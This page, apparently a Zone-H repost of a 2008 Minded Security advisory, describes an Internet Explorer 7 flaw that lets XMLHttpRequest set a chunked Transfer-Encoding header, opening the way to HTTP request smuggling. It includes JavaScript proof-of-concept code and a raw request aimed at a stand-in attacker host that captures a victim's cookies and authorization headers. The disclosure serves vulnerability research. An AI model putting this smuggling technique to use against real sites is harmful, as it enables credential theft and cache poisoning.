Advertisement
Home arrow ITsec Advisories arrow Microsoft Internet Explorer "Transfer-Encoding: chunked" allows Request Splitting/Smuggling
Friday, 25 July 2008
  
 
Last week attacks
O.S.  Defs.  %
Linux  5378  68.98%
Win 2003  1841  23.61%
Win 2000  290  3.72%
FreeBSD  166  2.13%
MacOSX  67  0.86%
Other  54  0.69%

Total attacks: 7796 of which 2243 single ip and 5553 mass defacements

Main Menu
Home
Digital Warfare
Geopolitics
ITsec News
ITsec Advisories
Test Drive
360°
Digital Attacks Archive
Zone-H events
Publications
Zone-H Friends/Partners
Contact Us
Search
Download Area
Zone-H forum
About this website
Login Form





Lost Password?
No account yet? Register
Visitors' Map
Microsoft Internet Explorer "Transfer-Encoding: chunked" allows Request Splitting/Smuggling PDF Print E-mail
User Rating: / 0
PoorBest 
Written by Marcelo Almeida (Vympel)   
Tuesday, 25 March 2008

Minded Security Labs: Advisory #MSA01240108

Microsoft Internet Explorer "Transfer-Encoding: chunked" allows Request Splitting/Smuggling.

Tested Versions: Internet Explorer 7.0.5730.11

Tested OS:  XP Professional SP2 Italian

Minded Security ReferenceID: MSA01240108

Credits: Discovery by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com

Severity:  Medium/High

Summary
Internet Explorer 7 allows setting of header "Transfer Encoding:
chunked" in setRequestHeader exposing the browser to Http Request Splitting/Smuggling attacks... 

Analysis


Let's suppose the following scenery (which is not necessarily the only one).
- A site vulnerable to reflected Xss is hosted on the same host as an attacker site. - User has no proxy configured.
As IE7 allows setting

setRequestHeader("Transfer-Encoding","chunked");

so, it allows using the payload in a POST request which will be considered as another request by the web server.

For example:

-----------------------------------------------------
var x=new XMLHttpRequest();

for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");

x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
try{
x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:
at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n") }catch(r){} }
-----------------------------------------------------

the request will become:
----------------------------------------------------
POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67

0

POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest
----------------------------------------------------

That way, the web server, will wait for the payload, keeping the socket open.

Infact RFC 2616 says that :
---------
If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.
---------

So the payload will be parsed as chunked.

Then by forcing IE to perform several requests on the victim host, the browser will reuse the previous (open) socket, thus sending the request as payload to the attacker site.

When at.tack.er host receive the request, there are several attacks, it could perform:

1. Stealing the headers of the request to vi.ct.im host (httponly cookies, Authorization data..)
2. Perform local cache poisoning by using Expire: header from the attacker poisoned page.

A proof of concept was developed.

Keep in mind that several other sceneries could be abused as well (see references).


Credits


Stefano di Paola is credited with the discovery of this vulnerability.

Disclosure Timeline


25/01/2008 Initial vendor notification
25/01/2008 Vendor Confirmed
21/03/2008 Public advisory

Reference


[1] "Http Request Smuggling", Chaim Linhart, Amit Klein, Ronen
Heled, Steve Orrin, 2005.
http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

[2] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing,
and a lot more...", Amit Klein, 2005.
http://www.securityfocus.com/archive/1/411585

[3] "HTTP Header Injection Vulnerabilities in the Flash Player
Plugin", 2006.
http://download2.rapid7.com/r7-0026/

[4] "Auto Injecting Cross Domain Scripting", pp 6-7, Stefano Di Paola,
Giorgio Fedon, 2007
http://www.wisec.it/docs.php?id=4

Original article: MSA01240108


Comments Index (Total Messages: 0)


Post Reply
Name:Guest
Title:
Comment:



Enter this security word

Powered by a Zone-H(ified) version of AkoComment 3.0!


DISCLAIMER: Forum postings are the opinion of the posting author alone, and should not be taken as the opinion of Zone-h. The   author is entirely and solely responsible for all content that he/she uploads, posts, or otherwise transmits via the website. Zone-h is not responsible for such content. However, Zone-h shall have the right, but not the obligation, to delete, move, or edit any content that violates this agreement or is otherwise objectionable as determined by Zone-h in its sole discretion and without notice.
 
< Prev   Next >
[ Back ]
 
Top!
© 2008 Zone-H.org
Joomla! is Free Software released under the GNU/GPL License.
 Top!